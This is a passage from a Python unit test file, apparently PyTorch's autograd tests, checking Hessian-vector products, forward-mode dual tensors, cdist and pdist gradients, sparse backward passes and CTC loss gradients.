return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are not impacted by detach
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 2)
self.assertEqual(t, bar * 2)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 2)
self.assertEqual(t, bar * 2)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that backward non-differentiable views don't prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# to avoid extremum
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# input_length, vary_lengths, zero_lengths
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
